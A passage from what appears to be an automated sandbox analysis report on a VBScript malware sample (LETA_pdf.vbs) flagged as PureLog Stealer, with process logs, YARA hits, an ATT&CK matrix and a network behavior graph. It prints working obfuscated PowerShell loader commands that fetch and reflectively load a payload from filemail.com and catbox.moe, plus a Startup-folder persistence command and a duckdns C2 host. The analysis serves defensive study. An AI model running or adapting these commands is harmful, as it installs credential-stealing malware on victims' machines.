ZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\leta_pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.jjc.vbs')')
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtse9nzvs0xsskchnit01fwzmwxssnwccpicgoj1boumltywdlvxjsjysnid0gzlhzahr0chm6ly8xmde3lmzpbgvtywlslmnvbs9hcgkvzicrj2lszs9nzxq/zicrj2lszwtlet0yjysnqwffyldvovjldtq1dddcvtfrvmdzzdlwvdlwz1ntbhztdedyblrjq2zgag1us2oztem2u1f0swnpy19umzv3jnbrx3zpzd1mzdrmnje0ymiymdljnjjjmtczmdk0nte3nmewota0zibmwfk7ughsjysnd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtqafjpjysnbwfnzuj5dgvzid0gughsd2viq2xpzw50licrj0rvd25sb2fkrgf0yshqafjpbwfnzvvybck7ughsaw1hz2vuzxh0id0gw1n5jysnc3rlbs5uzxh0lkvuy28nkydkaw5nxto6vvrgoc5hzxrtdhjpbmcoughsaw1hz2vcescrj3rlcyk7ughsc3rhcnqnkydgbgfnid0gzlhzpdxcqvnfnjrfu1rbulq+pmzywttqafjlbmrgbgfnid0gzlhzpdwnkydcqvnfnjrfru5epj5mwfk7ughsc3rhcnrjbmqnkydleca9ifboumltywdlvgv4dc5jjysnbmrljysnee9mkfbounn0yxj0rmxhzyk7ughszw5ksw5kzxggpsbqafjpbwfnzvrlehqusw5kzxhpzihqafjlbmrgbgenkydnkttqafjzdgfydeluzgv4ic1nzsawic1hbmqgughszw5ksw5kzxgglwd0ifbounn0yxj0sw5kzxg7uccrj2hsc3rhcnrjbmrlecarpsbqafjzjysndgfydezsywcutgvuz3roo1boumjhc2u2nexlbmd0aca9ifboumvuzeluzgv4ic0gughsc3rhcnrjbmrledtqafjiyxnlnjrdb21tyw5kid0gughsaw1hz2vuzxh0lln1ynn0cmluzyhqafjzdgfydeluzgv4jysnlcbqafjiyxnlnjrmzw5ndggpo1boumjhc2u2nfjldmvyc2vkid0glwpvaw4gkfboumjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksb1tfqgrm9yrwfjac1pymply3qgeybqafinkydfih0pwy0xli4tkfboumjhc2u2nenvbw1hbmqutgvuz3rokv07ughsy29tbwfuzej5dgvzid0gw1n5c3qnkydlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhqafjijysnyxnlnjrszxzlcnnlzck7ughsbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfboumnvbw1hbmrcexrlcyk7ughsdmfptwv0ag9kid0gw2rubglilklpjysnlkhvbwvdlkdlde1ldghvzchmwflwqulmwfkpo1bounzhau1ldghvzc5jbnzva2uoughsbnvsbcwgqchmwfl0ehqunzbvmwp6l2vvbs54b2j0ywmuc2vsawyvlzpzchr0agzywswgzlhzzgvzjysnyxrpdmfkb2zywswgzlhzzgvzyxrpdmfkb2zywswgzlgnkydzzgvzyxrpdmfkb2zywswgzlhzsw5zdgfsbfv0awxmwfksigzywwrlc2f0axzhzg9mwccrj1ksigzywwrlc2f0axzhzg9mwfkszlhzzgvzyxrpdmfkb2zywsxmwflkzxnhdgl2ywrvzlhzlgzywwrlc2f0axzhzg8nkydmwfkszlhzzgvzyxrpdmfkb2zywsxmwflkzxnhdgl2ywrvzlhzlgzywtfmwfkszlhzzgvzyxrpdmfkb2zywskpoycplljfcgxbq0uokftjaefsxtewmitby2hbul04octby2hbul04osksw3n0ukloz11by2hbul0zoskuukvwbefdrsgow2noqvjdmte3k1tjaefsxtc2k1tjaefsxtg0kswnfccplljfcgxbq0uoj1bouicsjyqnksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[4]+$pshome[30]+'x') (('phrimageurl'+' = fxyhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f fxy;phr'+'webclient = new-object system.net.webclient;phri'+'magebytes = phrwebclient.'+'downloaddata(phrimageurl);phrimagetext = [sy'+'stem.text.enco'+'ding]::utf8.getstring(phrimageby'+'tes);phrstart'+'flag = fxy<<base64_start>>fxy;phrendflag = fxy<<'+'base64_end>>fxy;phrstartind'+'ex = phrimagetext.i'+'nde'+'xof(phrstartflag);phrendindex = phrimagetext.indexof(phrendfla'+'g);phrstartindex -ge 0 -and phrendindex -gt phrstartindex;p'+'hrstartindex += phrs'+'tartflag.length;phrbase64length = phrendindex - phrstartindex;phrbase64command = phrimagetext.substring(phrstartindex'+', phrbase64length);phrbase64reversed = -join (phrbase64command.tochararray() ult foreach-object { phr'+'_ })[-1..-(phrbase64command.length)];phrcommandbytes = [syst'+'em.convert]::frombase64string(phrb'+'ase64reversed);phrloadedassembly = [system.reflection.assembly]::load(phrcommandbytes);phrvaimethod = [dnlib.io'+'.home].getmethod(fxyvaifxy);phrvaimethod.invoke(phrnull, @(fxytxt.70o1jz/eom.xobtac.selif//:sptthfxy, fxydes'+'ativadofxy, fxydesativadofxy, fx'+'ydesativadofxy, fxyinstallutilfxy, fxydesativadofx'+'y, fxydesativadofxy,fxydesativadofxy,fxydesativadofxy,fxydesativado'+'fxy,fxydesativadofxy,fxydesativadofxy,fxy1fxy,fxydesativadofxy));').replace(([char]102+[char]88+[char]89),[string][char]39).replace(([char]117+[char]76+[char]84),'|').replace('phr','$') )"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\leta_pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.jjc.vbs')')Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtse9nzvs0xsskchnit01fwzmwxssnwccpicgoj1boumltywdlvxjsjysnid0gzlhzahr0chm6ly8xmde3lmzpbgvtywlslmnvbs9hcgkvzicrj2lszs9nzxq/zicrj2lszwtlet0yjysnqwffyldvovjldtq1dddcvtfrvmdzzdlwvdlwz1ntbhztdedyblrjq2zgag1us2oztem2u1f0swnpy19umzv3jnbrx3zpzd1mzdrmnje0ymiymdljnjjjmtczmdk0nte3nmewota0zibmwfk7ughsjysnd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtqafjpjysnbwfnzuj5dgvzid0gughsd2viq2xpzw50licrj0rvd25sb2fkrgf0yshqafjpbwfnzvvybck7ughsaw1hz2vuzxh0id0gw1n5jysnc3rlbs5uzxh0lkvuy28nkydkaw5nxto6vvrgoc5hzxrtdhjpbmcoughsaw1hz2vcescrj3rlcyk7ughsc3rhcnqnkydgbgfnid0gzlhzpdxcqvnfnjrfu1rbulq+pmzywttqafjlbmrgbgfnid0gzlhzpdwnkydcqvnfnjrfru5epj5mwfk7ughsc3rhcnrjbmqnkydleca9ifboumltywdlvgv4dc5jjysnbmrljysnee9mkfbounn0yxj0rmxhzyk7ughszw5ksw5kzxggpsbqafjpbwfnzvrlehqusw5kzxhpzihqafjlbmrgbgenkydnkttqafjzdgfydeluzgv4ic1nzsawic1hbmqgughszw5ksw5kzxgglwd0ifbounn0yxj0sw5kzxg7uccrj2hsc3rhcnrjbmrlecarpsbqafjzjysndgfydezsywcutgvuz3roo1boumjhc2u2nexlbmd0aca9ifboumvuzeluzgv4ic0gughsc3rhcnrjbmrledtqafjiyxnlnjrdb21tyw5kid0gughsaw1hz2vuzxh0lln1ynn0cmluzyhqafjzdgfydeluzgv4jysnlcbqafjiyxnlnjrmzw5ndggpo1boumjhc2u2nfjldmvyc2vkid0glwpvaw4gkfboumjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksb1tfqgrm9yrwfjac1pymply3qgeybqafinkydfih0pwy0xli4tkfboumjhc2u2nenvbw1hbmqutgvuz3rokv07ughsy29tbwfuzej5dgvzid0gw1n5c3qnkydlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhqafjijysnyxnlnjrszxzlcnnlzck7ughsbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfboumnvbw1hbmrcexrlcyk7ughsdmfptwv0ag9kid0gw2rubglilklpjysnlkhvbwvdlkdlde1ldghvzchmwflwqulmwfkpo1bounzhau1ldghvzc5jbnzva2uoughsbnvsbcwgqchmwfl0ehqunzbvmwp6l2vvbs54b2j0ywmuc2vsawyvlzpzchr0agzywswgzlhzzgvzjysnyxrpdmfkb2zywswgzlhzzgvzyxrpdmfkb2zywswgzlgnkydzzgvzyxrpdmfkb2zywswgzlhzsw5zdgfsbfv0awxmwfksigzywwrlc2f0axzhzg9mwccrj1ksigzywwrlc2f0axzhzg9mwfkszlhzzgvzyxrpdmfkb2zywsxmwflkzxnhdgl2ywrvzlhzlgzywwrlc2f0axzhzg8nkydmwfkszlhzzgvzyxrpdmfkb2zywsxmwflkzxnhdgl2ywrvzlhzlgzywtfmwfkszlhzzgvzyxrpdmfkb2zywskpoycplljfcgxbq0uokftjaefsxtewmitby2hbul04octby2hbul04osksw3n0ukloz11by2hbul0zoskuukvwbefdrsgow2noqvjdmte3k1tjaefsxtc2k1tjaefsxtg0kswnfccplljfcgxbq0uoj1bouicsjyqnksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[4]+$pshome[30]+'x') (('phrimageurl'+' = fxyhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f fxy;phr'+'webclient = new-object system.net.webclient;phri'+'magebytes = phrwebclient.'+'downloaddata(phrimageurl);phrimagetext = [sy'+'stem.text.enco'+'ding]::utf8.getstring(phrimageby'+'tes);phrstart'+'flag = fxy<<base64_start>>fxy;phrendflag = fxy<<'+'base64_end>>fxy;phrstartind'+'ex = phrimagetext.i'+'nde'+'xof(phrstartflag);phrendindex = phrimagetext.indexof(phrendfla'+'g);phrstartindex -ge 0 -and phrendindex -gt phrstartindex;p'+'hrstartindex += phrs'+'tartflag.length;phrbase64length = phrendindex - phrstartindex;phrbase64command = phrimagetext.substring(phrstartindex'+', phrbase64length);phrbase64reversed = -join (phrbase64command.tochararray() ult foreach-object { phr'+'_ })[-1..-(phrbase64command.length)];phrcommandbytes = [syst'+'em.convert]::frombase64string(phrb'+'ase64reversed);phrloadedassembly = [system.reflection.assembly]::load(phrcommandbytes);phrvaimethod = [dnlib.io'+'.home].getmethod(fxyvaifxy);phrvaimethod.invoke(phrnull, @(fxytxt.70o1jz/eom.xobtac.selif//:sptthfxy, fxydes'+'ativadofxy, fxydesativadofxy, fx'+'ydesativadofxy, fxyinstallutilfxy, fxydesativadofx'+'y, fxydesativadofxy,fxydesativadofxy,fxydesativadofxy,fxydesativado'+'fxy,fxydesativadofxy,fxydesativadofxy,fxy1fxy,fxydesativadofxy));').replace(([char]102+[char]88+[char]89),[string][char]39).replace(([char]117+[char]76+[char]84),'|').replace('phr','$') )"Jump to behavior
                        Source: InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                        Source: InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                        Source: InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                        Source: InstallUtil.exe, 0000000D.00000002.3421734671.0000000001157000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3456980459.0000000005888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information221
                        Scripting
                        Valid Accounts1
                        Windows Management Instrumentation
                        221
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        OS Credential Dumping2
                        File and Directory Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        312
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory13
                        System Information Discovery
                        Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts12
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        12
                        Obfuscated Files or Information
                        Security Account Manager121
                        Security Software Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive11
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        Login HookLogin Hook1
                        Software Packing
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput Capture1
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell
                        Network Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets31
                        Virtualization/Sandbox Evasion
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input Capture113
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion
                        DCSync1
                        Remote System Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                        Process Injection
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559694 Sample: LETA_pdf.vbs Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 34 deadpoolstart2025.duckdns.org 2->34 36 paste.ee 2->36 38 3 other IPs or domains 2->38 60 Suricata IDS alerts for network traffic 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Yara detected PureLog Stealer 2->64 70 11 other signatures 2->70 9 wscript.exe 1 2->9         started        signatures3 66 Uses dynamic DNS services 34->66 68 Connects to a pastebin service (likely for C&C) 36->68 process4 dnsIp5 46 paste.ee 172.67.187.200, 443, 49707, 49708 CLOUDFLARENETUS United States 9->46 72 System process connects to network (likely due to code injection or exploit) 9->72 74 VBScript performs obfuscated calls to suspicious functions 9->74 76 Suspicious powershell command line found 9->76 78 4 other signatures 9->78 13 cmd.exe 1 9->13         started        16 powershell.exe 7 9->16         started        signatures6 process7 signatures8 80 Wscript starts Powershell (via cmd or directly) 13->80 82 Uses ping.exe to sleep 13->82 84 Uses ping.exe to check the status of other devices and networks 13->84 18 powershell.exe 7 13->18         started        21 PING.EXE 1 13->21         started        24 conhost.exe 13->24         started        86 Suspicious powershell command line found 16->86 88 Obfuscated command line found 16->88 26 powershell.exe 14 16 16->26         started        28 conhost.exe 16->28         started        process9 dnsIp10 50 Suspicious powershell command line found 18->50 52 Obfuscated command line found 18->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 40 127.0.0.1 unknown unknown 21->40 42 ip.1017.filemail.com 142.215.209.78, 443, 49734 HUMBER-COLLEGECA Canada 26->42 44 files.catbox.moe 108.181.20.35, 443, 49785 ASN852CA Canada 26->44 56 Writes to foreign memory regions 26->56 58 Injects a PE file into a foreign processes 26->58 30 InstallUtil.exe 2 26->30         started        signatures11 process12 dnsIp13 48 deadpoolstart2025.duckdns.org 181.71.217.114, 4203, 49804 ColombiaMovilCO Colombia 30->48 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or 